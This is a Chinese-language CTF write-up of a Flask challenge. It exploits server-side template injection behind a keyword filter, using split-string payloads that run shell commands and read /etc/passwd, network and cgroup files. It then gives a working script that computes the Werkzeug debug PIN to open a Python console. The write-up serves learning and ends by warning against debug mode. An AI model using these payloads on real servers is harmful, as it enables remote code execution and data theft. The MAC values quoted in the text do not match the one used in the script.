目录
进来有提示就看提示!摆烂的大动作!
计算pin码
我们可以查看/etc/passwd文件。
使用如下命令
getattr(mod, ‘file’, None)flask目录下的app.py的绝对路径
当前电脑的MAC地址
机器的ID
总结:
进来有提示就看提示!摆烂的大动作!
入手点看来是失败了加密不可能失败,那就只能是解密失败了!解密失败后出现
debug模式,读取到了部分源码
@app.route('/decode',methods=['POST','GET'])
def decode():
if request.values.get('text') :
text = request.values.get("text")
text_decode = base64.b64decode(text.encode())
tmp = "结果 : {0}".format(text_decode.decode())
if waf(tmp) :
flash("no no no !!")
return redirect(url_for('decode'))
res = render_template_string(tmp)
根据代码我们知道加密后的代码经过waf后会被直接渲染,想起来这个名字是flask,那么可能存在ssti注入了!
验证一下吧!加密{{1+1}}得到e3sxKzF9fQ==然后解密一下得到2说明存在ssti注入
简单fuzz后发现过滤了flag、import、os、eval等关键词,我们用拆分bypass!
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
{% for b in c.__init__.__globals__.values() %}
{% if b.__class__ == {}.__class__ %}
{% if 'eva'+'l' in b.keys() %}
{{ b['eva'+'l']('__impor'+'t__'+'("o'+'s")'+'.pope'+'n'+'("ls /").read()') }}
{% endif %}
{% endif %}
{% endfor %}
{% endif %}
{% endfor %}
加密后解密
拼接拿flag
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
{% for b in c.__init__.__globals__.values() %}
{% if b.__class__ == {}.__class__ %}
{% if 'eva'+'l' in b.keys() %}
{{ b['eva'+'l']('__impor'+'t__'+'("o'+'s")'+'.pope'+'n'+'("cat /this_is_the_fl"+"ag.txt").read()') }}
{% endif %}
{% endif %}
{% endfor %}
{% endif %}
{% endfor %}
计算pin码
看到可以登录控制台同时,但是不太了解这个debug控制台的pin值,百度一下。
好像这个是预期解。
。
想要拿到PIN码
必须知道:
我们可以查看/etc/passwd文件。1.运行app的用户名,读/etc/passwd 2.module name 一般固定为flask.app 3.getattr(app, "\_\_name\_\_", app.\_\_class\_\_.\_\_name\_\_)的结果。
就是Flask 4.flask库下app.py的绝对路径,不是当前运行的app.py的路径,在debug模式下报错就能直接看见,该题为/usr/local/lib/python3.7/site-packages/flask/app.py 5.当前网络的mac地址的十进制数。
通过文件/sys/class/net/eth0/address读取,eth0为当前使用的网卡,如果有多个网卡数字可能会变,这里为02:42:ae:00:c3:58,转十进制为 2485410382680 6.机器的id 对于非docker机每一个机器都会有自已唯一的id,linux的id一般存放在/etc/machine-id或/proc/sys/kernel/random/boot_i,有的系统没有这两个文件,windows的id获取跟linux也不同,假如是在win平台下读取不到上面两个文件,就去获取注册表中SOFTWARE\Microsoft\Cryptography的值。
对于docker机则读取/proc/self/cgroup,序列号为1那行 1:name=systemd:/docker/210b2177689514627fab120347f7d1ea1e986bed6a9ef57504e2e3ac22e38c3c
使用如下命令
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
{% for b in c.__init__.__globals__.values() %}
{% if b.__class__ == {}.__class__ %}
{% if 'eva'+'l' in b.keys() %}
{{ b['eva'+'l']('__impor'+'t__'+'("o'+'s")'+'.pope'+'n'+'("cat /etc/passwd").read()') }}
{% endif %}
{% endif %}
{% endfor %}
{% endif %}
{% endfor %}
{{{}.__class__.__mro__[-1].__subclasses__()[102].__init__.__globals__['open']('/etc/passwd').read()}}
这两种都可以读取,这样我们可以知道是flaskweb用户。
报错信息告诉我们
/usr/local/lib/python3.7/site-packages/flask/app.py
当前电脑的MAC地址
我们可以读取/sys/class/net/eth0/address
来获得mac的16进制:
{{{}.__class__.__mro__[-1].__subclasses__()[102].__init__.__globals__['open']('/sys/class/net/eth0/address').read()}}
得到a6:ac:19:45:f1:d8
将其转10进制183258088600024
许多工具都不准确,值得注意。
可以采用本地用python跑的方式,在本地python输入
>>> print(int('a6ac1945f1d8',16))
183258088600024
机器的ID
读取/proc/self/cgroup
获取get_machine_id()
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/proc/self/cgroup','r').read() }}{% endif %}{% endfor %}
1:name=systemd:/kubepods.slice/kubepods-burstable.slice/kubepods-burstable-podcc096863_49c3_4caa_b633_05615b822d2b.slice/docker-b6ff692442683c70ab69d01d5310a9aba4d3014fc147c329891658c0e2048332
我们要的是
1:name=systemd:/docker-b6ff692442683c70ab69d01d5310a9aba4d3014fc147c329891658c0e2048332
计算PIN码:
import hashlib
from itertools import chain
probably_public_bits = [
'flaskweb',# username
'flask.app',# modname
'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
'/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]
private_bits = [
'2485377871838',# str(uuid.getnode()), /sys/class/net/ens33/address
'4e2d4390ee2a9b57df253521f44301973efc74e35a300a02b4e509d60989543b'# get_machine_id(), /etc/machine-id
]
h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]
rv =None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num
print(rv)
将得到的PIN码在Debug页面输入进入控制台,既可以执行python shell了:
os.popen('cat /this_is_the_flag.txt').read()
总结:
又见到了ssti注入,可以拼接绕过!
又学到了pin码计算,不要开启dubug模式
感谢buu提供优质的题,感谢勤劳的自己!
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)